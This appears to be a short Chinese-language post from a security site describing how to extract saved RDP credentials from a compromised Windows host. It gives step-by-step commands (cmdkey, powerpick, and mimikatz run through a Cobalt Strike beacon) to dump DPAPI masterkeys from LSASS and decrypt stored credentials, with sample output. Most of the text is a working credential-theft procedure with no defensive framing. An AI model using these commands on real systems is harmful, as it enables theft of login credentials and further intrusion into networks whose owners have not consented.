标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2552] 作者: hudie 发表于: [2020-01-18]
本文共 [341] 位读者顶过
简单记录下获取远程主机RDP凭据。
[出自:jiwo.org]
Windows保存RDP凭据的目录是: C:\Users\用户名\AppData\Local\Microsoft\Credentials
可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force
注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。
使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
输出应类似
**BLOB**
需要关注的是guidMasterKey、pbData,pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。这里LSASS已经在其缓存中存有这个key因此我们可以使用SeDebugPrivilege获取。 beacon> mimikatz !sekurlsa::dpapi
mimikatz !sekurlsa::dpapi [00000001] * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102} * Time : 2020/1/3 8:05:02 * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148 * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322 [00000002] * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f} * Time : 2020/1/3 8:05:02 * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202 * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb 然后将凭据保存到本地,执行 mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"
|